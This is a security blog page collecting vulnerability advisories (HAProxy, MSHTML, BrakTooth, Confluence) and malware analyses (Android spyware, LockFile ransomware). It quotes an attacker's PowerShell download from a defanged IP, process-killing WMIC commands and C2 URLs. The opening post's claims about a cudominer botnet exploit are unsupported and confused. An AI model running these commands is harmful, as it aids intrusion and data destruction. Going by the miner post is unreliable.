Are Bitcoin miners really malware for dark web?

- Posted in Exploit by

With the loss of business due to Covid-19, cryptocurrency has had a resurgence in uptake. Offers of better mining, and group mining from legitimate organizations have seen small business jump on the opportunity to increase revenue through currency mining. Unfortunately, this has also seen an increase in activity for exploits though the mining software.

History to new activity In the past the threat was confined to crypto hijacking. Sending a malware application to the unsuspecting user, and then installing, unaware to the user, an application that would start mining - commonly called cryptojacking. This prompted increases in malware protection and protection policies, that saw the problem move to more sophisticated means through social engineering and so on.

However, with the increase in unemployed workers and business loss due to covid-19, personal computers started to be assigned to the task of crypto mining to try and get people out of difficult spots. This increase in activity did not go unnoticed, and dark web actors turned their minds to exploiting these new users through their own uptake of mining software. This was great news to the hackers, as they no longer needed to force the malware or exploits as users voluntarily downloaded it through legitimate actors.

Industry Knowledge Before I explain how it is important to note that the exploit being deployed is known in the core code, and it appears that it has been unfixed as it allows Bitcoin to increased profits, or so some of the actors who exploit the code explain. They claim that they do this to bring awareness as bitcoin is ignoring their statements to them of how it exist and what it does.

The exploit So how does it work? Its very simple really, a user engaging in mining, signs up to a group management site and downloads a software mining application so that they can mine cryptocurrency in the group, or cloud pool - a pool they add from the machines they have, or friends and do on (cudominer is one as an example). The installed mining application reports to the sever and starts the mining process for the group based on the parameters and hardware set in the management site. Simple so far, the miner then goes off and starts mining and the user can see the hashes being generated and the approximate bitcoin currency they should earn in the month.

The exploit works in a two fold manner. First it allows the dark web to see your miners IP and add it to the botnet network. An attacker can then inject set of code to exploit your machine to process mining for other users not in your group, but are reported as your group in the form of a fee, which is then record to bitcoin as a legitimate fee. This fee is delivered to the botnet manager application available for purchase on the dark web by the actor setting-up the exploit.

Exploit purchase

The second issue relates to the code continuing even after closing the application. A user may close the miner, and think, right now I can do something else and leave it be. Unknown to the user, the miner may be turned on remotely by the exploiter and grab bitcoin from your machine/pool, and you will never know as it stays under the radar by not using 100% of the processor, it only becomes noticeable when using another application needing high resources, such as gaming, as it begins to slowdown or periodically freeze. Harder to notice on higher end gaming hardware due to the speed of allocating resources as calculations which appears more as latency than cpu/gpu load. What's worse, is you pay the power bill, they get 100% of the unseen transactions. The management software never sees it occurring, but the bitcoin is calculated to the exploited application and sent to the actor exploiting the flaw which is calculated off through bitcoin as legitimate due to the setup pool design.

The software is successful because you, the installer, have approved it to bypass your defenses (Windows defender etc) at install as it reports legitimately as a signed MS application from a legitimate company who is also likely to be unaware of the exploit as it is part of the core code working as intended.

Testing We actively tested the issue above after discovering websites on the dark web that advertised the exploits for use.

In our tests we saw as follows: 1 Active exploit to a large pool of devices that allowed for the collection of 2.5 bitcoin, undermining the value of bitcoin currency. 2 Active exploit of the miner application in Windows 10 that could not be closed in the task manager. 3 On reboot, the exploited miners became active again, meaning the miner code had been lodged into the startup code of the OS.

We also express additional concerns arise as to weather this exploit could be used for other malicious purposes?

We notified cudominer of our discovery, with no response, and we have confirmed that the calculations are short the sums we calculated for load and mining allocation compared to the reported sum in cudominer manager.

Recommendations Uninstall immediately.

To uninstall 1. Reconfigure your miners default setting manually by disconnecting from the pools default, and disable startup. Check the miner manager is disabled in your startup tab under task manager. Then uninstall the software and check to confirm that the antimalware settings have been removed. Reboot and test again. 2. Reset of the antimalware back to default is also recommended, it is easier to re approve apps than have the exploit active.

If you must run If you must run the code, and we understand why you might need too, place the code on a computer that only operates this code, and make sure it is firewalled from your main network. When you have finished the mining for the period you allocated, physically shutdown and turn off the machine until you need it next.

Remember that the code exploit sends money to the botnet for any form of criminal activity, and to date Anon has advised over 100million in bitcoin has been generated to date, so run these miner managers is not recommended until this exploit is fixed.

HAProxy Integer overflow exploit

- Posted in Vulnerability by

HAProxy is a free to use server load balancing application or software addon. JFrog Security reported on September 7 2021, that a vulnerability in an Integer Overflow existed in versions 2.0 through 2.5 in the htx_add_header() and htx_add_trailer() due to a missing length check on the header name that makes it possible for an attacker to bypass all configured http-request HAProxy ACLs, and possibly other ACLs, to conduct an HTTP Request Smuggling attack. This attack allows an adversary to “smuggle” HTTP requests to the backend server, without the proxy server being aware of it.

HA Proxy exploit

The smuggled requests have various impacts, depending on HAProxy’s configuration and the backend web server configuration. It is reported that the execution of the vulnerability can or may:

  • Bypass security controls, including any ACLs defined in HAProxy
  • Gain unauthorized access to sensitive data
  • Execute unauthorized commands or modifying data
  • Hijack user sessions
  • Exploit a reflected XSS vulnerability without user interaction

HTTP Request smuggling is based on interfering with the processing of HTTP requests between the frontend (i.e. HAProxy on a router) and the backend (being the server hosting the destination). An attacker typically exploits this technique by sending a specially crafted request that includes an additional request in its body. During a successful attack, the inner request is smuggled through the frontend, that considers it as only the request’s body, but in fact consist of an additional function hidden to the HAproxy frontend and is executed as a normal request by the backend.

In most cases, the smuggling technique is done by supplying both the Content-Length and Transfer-Encoding headers with contradicting lengths in the same request and aiming for parsing inconsistencies between the frontend and backend servers. In the original authors case, however, the attack was made possible by utilizing an integer overflow vulnerability that allowed reaching an unexpected state in HAProxy while parsing an HTTP request – specifically – in the logic that deals with Content-Length headers.

An important enabler condition that makes this class of attacks possible is that when the frontend server forwards HTTP requests to the backend, it uses the same established TCP connection instead of wasting time on opening and closing sockets. The requests are sent "back to back" and it is up to the backend server to decide where a request ends and the next one begins.

In our testing, the function can be protected against if the parse then reaches a server properly configured. However, where the server is a direct connection, ie no properly configured Apache or NGNIX, a direct Microsoft server port, then the execution is still possible.

As advised by HAProxy, the best solution is to upgrade to version 2.0.25, 2.2.17, 2.3.14 or 2.4.4 CVE-2021-40346, which provides a patch for such activity by adding size checks for the name and value lengths.

However, for security reasons HTTP traffic should by default be redirected to HTTPS, even if that needs to be done on the end server. This redirect will assist to remove the hidden execution where the patch above cannot be applied.

Recommendations If HAproxy cannot be immediately upgraded, HAProxy should have port 80 added as a https-redirect to rule "scheme https", or in the alternative, when accessing the end server, Apache or NGNIX redirect to HTTPS.

Where HAproxy cannot be upgraded at all, and a Https redirect is also not possible, due to say, vender firmware, the end server should be removed from HAProxy and the port dedicated in its connection to the end server until the hardware containing the firmware can be replaced. Even if this means web redetecting for clients.

Office 365/2019 MSHTML Vulnerability

- Posted in Vulnerability by

An organization named EXPMON discovered an Office 365/2019 vulnerability on September 5th 2021. The vulnerability lies within MSHTML, which is the Microsoft Internet Explorer browser engine. The vulnerability itself is a Remote code execution (RCE) attack, allowing the attacker to remotely install malware on the target machine.

Source tweet Source tweet

The exploit is performed by an attacker sending a user a modified .docx file. Said file will contain a script upon opening the document that will use the IE MSHTML engine to open the url programmed into the scripting in the .docx file.

Microsoft has recommended disabling scripts and active X execution, but we are not convinced this is enough due to the base IE11 code being left in the OS. Despite Microsoft not carrying over the IE coding from legacy Edge when they switched to the new Chromium based Edge browser, having legacy IE11 code within the OS still makes execution possible and we recommend removing the base IE11. This is, however, not a guarantee as Microsoft has not confirmed if the IE11 code exist in other parts of the OS, so the following prevention recommendations should always be followed:

Recommendation Internet Explorer 11, even if not showing on your computer, is likely still installed as a background app on your machine as Microsoft has maintained it for compatibility, it is recommended to remove it. You can do this by searching for windows features in the windows search bar. Uncheck the Internet Explorer 11 checkbox to remove "Internet Explorer" and IE11 code. Your PC should request a reboot, click reboot when prompted.

See walkthrough video here

If your business still requires use of Internet Explorer 11 for any reason, contact the developer of the program you are using to ask them to update their codebase to support modern web browsing.

It is important to remember that attachments are often insecure, and even if you have removed the above code, we continue to recommend not opening attachments unless you are absolutely sure of the source; and even then, only once you have confirmed that the source did send it.

The preferred approach is to use a sharing system such as our On The move server https://c-justice.com/odrsoftware.html available to all types of business, as one example; or other secure option instead of using attachments.

BRAKTOOTH: Causing Havoc on Bluetooth Link Manager

- Posted in Vulnerability by

Bluetooth Classic (BT) protocol is a widely used wireless protocol in laptops, handheld devices, and audio devices. In the past few years, Bluetooth has come under scrutiny due to the discovery of several critical vulnerabilities. In this report, the authors disclose BrakTooth, a family of new security vulnerabilities in commercial BT stacks that range from denial of service (DoS) via firmware crashes and deadlocks in commodity hardware to arbitrary code execution (ACE) in certain IoTs.

As of the report date, 16 different vulnerabilities, which impact billions of devices that rely on Bluetooth Classic (BT) for communication have been uncovered. According to an academic paper from the University of Singapore, the bugs are found in the closed commercial BT stack used by at least 1,400 embedded chip components, that can lead to a host of attack types – mainly denial of service (DoS) via firmware crashes (the term “brak” is actually Norwegian for “crash”). One of the bugs can also lead to arbitrary code execution (ACE).

The team analyzed 13 pieces of BT hardware from 11 vendors; so far, there have been 20 CVEs assigned across them; with four vulnerabilities pending CVE assignments from Intel and Qualcomm. Some of the bugs are patched, others are in the process of being patched; but, researchers said in the paper, “it is highly probable that many other products (beyond the ≈1400 entries observed in Bluetooth listing) are affected by BrakTooth,” including BT system-on-chips (SoCs), BT modules or additional BT end products.

Potentially, billions of devices could be affected worldwide. BrakTooth report by Asset Group

Illustration of BT connection process

Figure 1: An Illustration of the BT connection procedure. FHS stands for Frequency Hopping Synchronization, ID stands for Identity, LMP stands for Link Manager Protocol and ACL stands for Asynchronous Connection Less.

Poc setup

Figure 2: An Illustration of BrakTooth attack scenario

Figure 2 showcases the generic scenario in which BrakTooth attacks are performed. The attacker only requires (1) a cheap ESP32 development kit (ESP-WROVER-KIT [37]) with a custom (non-compliant) LMP firmware and (2) a PC to run the PoC tool. The PoC tool communicates with the ESP32 board via serial port (/dev/ttyUSB1) and launches the attacks according to the specified target BDAddress () and exploit name parameter ().

Furthermore, the PoC tool logs over-the-air (OTA) packets and checks the health of the target by getting a paging timeout (no response) or alternatively getting status directly from the target via a serial port, ssh connection, etc.

Researchers successfully forced ESP32 into erasing data housed in devices’ non-volatile random-access memory (NVRAM), which retains data without applied power. They were also able to disable both BT and Wi-Fi on the device; and most concerningly, control the general-purpose input/output (GPIO) of the device if the attacker knows addresses to attached functions-controlling actuators. GPIO is used to communicate the ON/OFF signals received from connected switches, or the digital readings received from connected sensors, to the CPU.

“This has serious implications if such an attack is applied to Bluetooth-enabled smart home products,” the researchers warned.

Second form of atatck - Laptops and devices The second attack scenario can lead to DoS in laptops and smartphones. Researchers were able to achieve this using gear containing Intel AX200 SoCs and Qualcomm WCN3990 SoCs.

One of the DoS bugs (CVE-2021-34147) exists because of a failure in the SoC to free resources upon receiving an invalid LMP_timing_accuracy_response from a connected BT device (i.e., a “slave,” according to the paper:

“The attacker can exhaust the SoC by (a) paging, (b) sending the malformed packet, and (c) disconnecting without sending LMP_detach,” researchers wrote. “These steps are repeated with a different BT address (i.e., BDAddress) until the SoC is exhausted from accepting new connections. On exhaustion, the SoC fails to recover itself and disrupts current active connections, triggering firmware crashes sporadically.”

The researchers were able to forcibly disconnect slave BT devices from Windows and Linux laptops, and cause BT headset disruptions on Pocophone F1 and Oppo Reno 5G smartphones.

A third possible attack - Audio attacks A third attack scenario was discovered while probing various BT speakers (specifically the Mi Portable Bluetooth Speaker – MDZ-36-DB, BT Headphone and BT Audio Modules) and an unbranded BT audio receiver.

They all are variously subject to a series of bugs (CVE-2021-31609 andCVE-2021-31612, failures when sending oversized LMP packets; CVE-2021-31613, truncated packets; CVE-2021-31611, starting procedures out-of-order; and CVE-2021-28135, CVE-2021-28155 and CVE-2021-31717, feature response flooding).

Successful exploits can “freeze” devices, requiring the user to manually turn on unresponsive devices afterwards. For the Xiaomi MDZ-36-DBs and JBL TUNE 500BTs, this can be done while the user is actively playing music, researchers noted.

“Although issues were found in SoCs targeted to audio products, the BT implementation can be reused in a number of SoCs destined to different BT products,” they added.

These are just a few of the possible exploit scenarios.

Confluence attack wave affects Jenkins

- Posted in Vulnerability by

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

CVE-2021-26084 Detail

The attack has been reported to have affected Jenkins. The developers of the Jenkins server, one of the most widely used open-source automation systems, said they suffered a security breach after hackers gained access to one of their internal servers built on Confluence and deployed a cryptocurrency miner.

The Jenkins breach is part of a recent wave of attacks exploiting CVE-2021-26084 (also nicknamed Confluenza), an authentication bypass and command injection bug in Atlassian’s Confluence server which is reported as an OGNL injection vulnerability that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.

This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.

Atlassian workgroup discussion

The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.

It has been listed as a low priority at Atlassian despite it being reported to have a critical severity.

Spyware Variant Disguised As Korean Video App Targets Multiple Asian Countries

- Posted in Spyware by

A mobile app targeting both iOS and Android users primarily from China, Korea, and Japan was first identified by Lookout Threat Intelligence team in December 2020. The apps conduct spyware activities by offering escort services while they steal personal information from the victim’s device. The goal of the attackers behind this data exfiltration of personal information is extortion or blackmail. 

This particular type of scam is commonly called “Sextortion” and it typically targets multiple countries. These applications are often disguised as messaging, camera, and utility apps and are designed to exfiltrate data such as: 

  • Contacts
  • SMS data
  • Location information
  • Images from device storage

Technical Analysis 

During our routine threat hunting exercise, Cyble Research Labs came across a Twitter post that mentioned spyware masquerading as a Korean video app named “동영상“.

Researchers at Cyble downloaded the malware samples and performed a detailed analysis, based on which, we determined that the malware is a variant of spyware and uploads the victim data to a Command & Control (C2) server. 

APK Metadata Information 

  • App Name: 동영상 
  • Package Name: org.nnnmbook.sytyd 
  • SHA256 Hash: 0bda73046fd733164877071d11318ec6dd56a6ea4e773c70ed5a3c8f7a244478 

Figure 1 represents the metadata information of the application.

Figure 1 represents the metadata information of the application.

The malware has a set of permissions, out of which the attackers leverage three permissions to collect contacts, SMSs, and the victim’s location. These dangerous permissions are listed in Table 1. 

Permissions Description 
INTERNET  Allows applications to open network sockets 
READ_PHONE_STATE  Read-only access to phone state 
READ_CONTACTS Access to phone contacts 

Table 1 Permission used for malicious activity

Upon simulating the app, they observed that it initially requests users for permission to read contacts. Once the app has this permission, it loads the app’s main activity, as shown in Figure 2.

Figure 2 App Flow

The app uses the permissions granted by the users to perform these activities on the users’ devices:  

  • The app reads the contacts from the compromised device and stores them in the array list

Reads nd Collects Contacts

  • Collected contacts are stored in a JSON file and are uploaded to a C2 link as shown in figure below.

Upload to C2 Lin k

  • The application also has a code function to read and collect SMS data from the compromised device.

Read and collect messages

  • As shown in Figure 6, the collected SMS details are stored in a JSON file and are uploaded to the C2 link as represented below.

Upload to C2 Link

  • Upon finding the functions being called, where the collected contacts and messages are sent via C2 link, the app further connects to the function that performs additional activities such as collecting albums and device details.

Sensitive Info collected

The app synchronizes the user’s device data with the C2 login page used by the attacker to fetch the stored sensitive information.

Information to C2 Link

Conclusion  

Despite having been around for a long time, spyware still poses a significant threat as the Threat Actors responsible are constantly adapting and using various encryption techniques to avoid detection. This makes the removal of spyware nearly impossible. Thus, users should exercise caution while installing applications.

SAFETY RECOMMENDATIONS: 

  • Keep your anti-virus software updated to detect and remove malicious software. 
  • Verify the publisher before installing the app. Go to the actual companies website for the app you want, and confirm the apps information and details before installing.
  • Uninstall the application if you find this malware on your device. 
  • Keep your system and applications updated to the latest versions. 
  • Use strong passwords and enable two-factor authentication. 
  • Download and install software only from trusted sites and official app stores. 
  • Verify the privileges and permissions requested by apps before granting them access. 

MITRE ATT&CK® Techniques- for Mobile 

Tactic Technique ID Technique Name 
Defense Evasion T1406 Obfuscated Files or Information 
Credential Access/Collection T1412 Capture SMS Messages 
Discovery T1421 System Network Connections Discovery 
Discovery T1426 System Information Discovery 
Collection T1432 Access Contact List 
Collection T1507 Network Information Discovery 
Impact T1447 Delete Device Data 

Indicators of Compromise (IoCs):   

Indicators Indicator type Description 
0bda73046fd733164877071d11318ec6dd56a6ea4e773c70ed5a3c8f7a244478 SHA 256 File Hash Analysed Malicious file 
hxxp://206.119.173[.]23:8080/m/uploadSms.htm URL C2 Link 
hxxp://206.119.173[.]23:8080/m/sychonizeUser.htm URL C2 Link 
hxxp://206.119.173[.]23:8080/m/openVip.htm URL C2 Link 
hxxp://206.119.173[.]23:8080/m/login.htm URL C2 Link 
hxxp://206.119.173[.]23:8080/m/uploadAlbum.htm URL C2 Link 

LockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell

- Posted in Ransomware by

​​LockFile ransomware was first seen in July 2021 and has been highly active since then. It has global operations, and most of the victims are from the United States of America and Asia. The ransomware group hosts a website in the TOR network to guide victims to pay the ransom and subsequently get the instructions to decrypt the files. This webpage contains a uTox ID and an email address to contact the Threat Actor (TA), as shown in the figure below.

Darkweb Lockfile

Cyble Researchers found that a few details indicate that the ransomware gang could also be related to the other threat actors from the ransomware website. For example, as mentioned in the ATTENTION section of the website, the last line mentions a wallpaper being provided by lockbit, and the contact email contains a reference to Conti.

​Recently the Threat Actor (TA) behind LockFile has started attacking Microsoft Exchange Servers using ProxyShell attack. The ProxyShell attack uses chained Microsoft Exchange vulnerabilities mentioned in the list below, resulting in unauthenticated code execution. Orange Tsai, a Principal Security Researcher from Devcore, recently discovered these vulnerabilities. Following is the list of vulnerabilities. ​

  • ​CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)
  • ​CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)
  • CVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435) ​

​According to a Symantec blog post, after successful exploitation, the TA uses the PowerShell command. ​

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

​The PowerShell command in use is unknown, but on August 13, 2021, an independent security researcher captured the associated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit ProxyShell Vulnerability.

Researchers also found that 20 to 30 minutes before the deployment of ransomware, the TA drops three files:

​An Exploit for PetitPotam vulnerability (CVE-2021-36942), namely efspotato.exe.

​Two files: active_desktop_render.dll and active_desktop_launcher.exe

​PetitPotam vulnerability allows the TA to compromise Domain Controller, which results in the compromise of the complete Active Directory. The PetitPotam technique uses MS-EFSRPC (Microsoft’s Encrypting File System Remote Protocol), Which is responsible for performing maintenance and management operations on the encrypted data stored on the remote system.

​As per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a malicious Dynamic Link Library (DLL). The active_desktop_render.dll is loaded using the DLL Search Order Hijacking attack. After loading, the DLL file drops and decrypts desktop.ini in a local directory. This desktop.ini then loads and executes shellcode, which then activates the efspotato.exe file that is exploited for the PetitPotam vulnerability.

​​Upon compromising the domain, the TA then deploys LockFile ransomware in various systems of the compromised domain.

​​Cyble Research found one of the LockFile malware samples from the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level execution flow of LockFile Ransomware. The malware initially kills all the known processes related to virtual machines, databases, and other related services. Then, it iterates through drives into the system to find the logical drive to search for files and folders. After the files are found, the malware checks the extensions of the file, and if matched to the pre-defined file extension, the ransomware encrypts it. After completing the encryption process, it deletes itself.

Exchange execution

Technical Analysis ​​Their static analysis found that the malware is a Windows-based x64 architecture Console application written in C/C++ and compiled on 2021-07-03 18:15:34, as shown in the figure below.

Details of static analysis

​As shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.

Details of malware execution

The subprocess kills various running processes shown in Table 1. The malware uses the Windows Management Interface Command (WMIC) command and provides the process name as a wild card in between %% to achieve this task. WMIC is a simple command prompt tool that returns information about the system you are running it on.

The list of commands which the malware has executed is shown in table below.

Command Target Process 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmwp%'” call terminate vmwp 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%virtualbox%'” call terminate virtualbox 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vbox%'” call terminate vbox 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%sqlservr%'” call terminate sqlservr 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%mysqld%'” call terminate mysqld 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%omtsreco%'” call terminate omtsreco 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%oracle%'” call terminate oracle 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%tnslsnr%'” call terminate tnslsnr 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmware%'” call terminate vmware 

Table 1 WMIC Commands executed by Ransomware to Kill Processes

Once the ransomware kills all the processes, it iterates through the victim’s machine and encrypts the user document files and appends extensions with .lockfile, as shown in the figure below.

Appended extensions

Figure 5: Files encrypted by LockFile

Once the files are encrypted, the malware launches an HTML Application file (HTA) to show the ransom message to the user, as shown in the figure below, and then deletes itself. ​

Ransomware message

Figure 6: Ransom Message Created by LockFile

Code Analysis And Debugging The figure below shows that the malware calls a series of WMIC commands to kill various processes upon debugging. The list of commands is shown in Table 1.

WMIC commands

Figure 7: WMIC commands used by LockFile ransomware to kill processes Once the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as shown below.

Ransom note

Figure 8: Ransom Note Extracted from LockFile Ransomware in Memory Afterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API). Finally, the list of drives is passed one at a time to GetDriveTypeA API, after which the result compares with 03 (DRIVE_FIXED), which indicates whether the found drive is fixed media, e.g., Logical Drives as shown below. Once the drive is located, the malware creates a thread to conduct further ransomware activity. ​

Fixed media checked

Figure 9: Fixed Media checked by LockFile

The malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.

Thread creating

Figure 10: LockFile’s Thread creating LOCKFILE-README.hta in C:/

Then the ransomware starts iterating through the files and folder. The code passes whatever files/folders are found through a series of checks. The checks are mentioned below list.

1 – desktop.ini string is not present in the filename

2 – Windows is not present in the full path

3 – LOCKFILE string is not present in the filename

4 – NTUSER string is not present in the filename

The checks are shown in the below code.

checks performed

Figure 11: Checks performed by LockFile.

Once all the checks are passed, the malware compares the files extension with a pre-defined extension embedded in the malware. The code is shown in the figure below.

comparison

Figure 12: File Extension Compared by LockFile

For example, in the below figure, we can see that the malware is comparing 36897c.rbf extension with .1cd extension.

file extensions

Figure 13 Ransomware Check File Extension

Similarly, the malware compares all extensions, shown in Table 2, with the victim’s file. This activity helps us conclude that the malware is targeting only a specific extension file.

.lcd .7z .7zip .acccdb .ai .asp .aspx .backup .bak .cd .cdr .cdx .cer .cf .cfl .cfu .config .cs .csv .dat .db .dbf .doc .docx .dt .dwg .edb .efd .elf .epf .erf .fpt .geo .grs .html .ibd .jpeg .ldf .lgf .lgp .log .mdb .mdf .mft .mp3 .mxl .myd .odt .pdf .pff .php .ppt .pptx .ps1 .psd .pst .rar .sln .sql .sqlite .st .tiff .txt .vdi .vhd .vhdx .vmdk .vrp .wdb .xls .xlsx .zip

Table 2 List of File Extensions which are targeted by ransomware

As shown below in figure 14, once the file is found with the defined extension, the malware reads the plain text content from the file.

read plain text

Figure 14 Read Plain Text content from Victim’s File

It then calls another user-defined function for encrypting the content using Advanced Encryption Standard (AES), as shown below.

call encryption

Figure 15 Call Encryption Function to encrypt the content

Once the content is encrypted, the malware writes it into the file, and then it appends the encrypted file with extension .lockfile using MoveFileA API, as shown in the below figure.

append

Figure 16 Append .lockfile extension to the user document file

The same activity is shown below in figure 17.

extension to user file

Figure 17 Append .lockfile extension to the user document file while debugging

Once all the files have been encrypted, the malware creates a ransom note .hta file in the C:UsersPublic directory, as shown in the figure below.

HTA

Figure 18 Creates .HTA ransom file C:UsersPublic

Once the .hta ransom file is created, it calls CreateProcess API to launch the .hta file using mshta.exe windows utility. The mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files.

mshta exe

Figure 19 Launch.HTA ransom File using mshta.exe

Finally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.

del command

Figure 20 Use Del command to delete itself

Conclusion 

The threat actors behind the LockFile exploit publicly disclosed vulnerabilities in sequence to attack Microsoft Exchange Server and then use PetitPotam vulnerability to compromise the Domain Controller. After achieving these two objectives, the TA drops the LockFile ransomware into the systems.

Based on the ransom notes, Cyble Research Labs speculate that the TA may be creating unique custom variants of the LockFile ransomware for each victim organization.

Cyble Research Labs continuously monitors the LockFile ransomware activity; we will continue to update our readers with our latest findings.

Recommendations

Cyble Research labs have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below: 

  • Use a reputed anti-virus and internet security software package on your connected devices.     
  • Conduct regular backup practices and keep those backups offline or in a separate network. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 

MITRE ATT&CK® Techniques

Tactic Technique ID Technique Name 
Reconnaissance T1595.002 T1591 T1593 Active Scanning Gather Victim Org Information Search Open Websites/Domains 
Initial Access T1190 Exploit Public-Facing Application 
Execution T1059.001 Command and Scripting Interpreter: PowerShell 
Defense Evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 
Lateral Movement T1210 Exploitation of Remote Services 
Impact T1486 Data Encrypted for Impact 

Indicators of Compromise (IoCs):   

Indicators Indicator type Description 
354a362811b8917bd7245cdd43fe12de9ca3f5f6afe5a2ec97eec81c400a4101 SHA256 LockFile Ransomware 
ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 SHA256 Malicious DLL 
36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 SHA256 Driver file 
5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f SHA256 Malicious executable 
1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 SHA256 Malicious DLL 
7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd SHA256 PetitPotam exploit 
bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce SHA256 LockFile executable 
209.14.0[.]234 IP address Attacher’s IP 
Page 2 of 2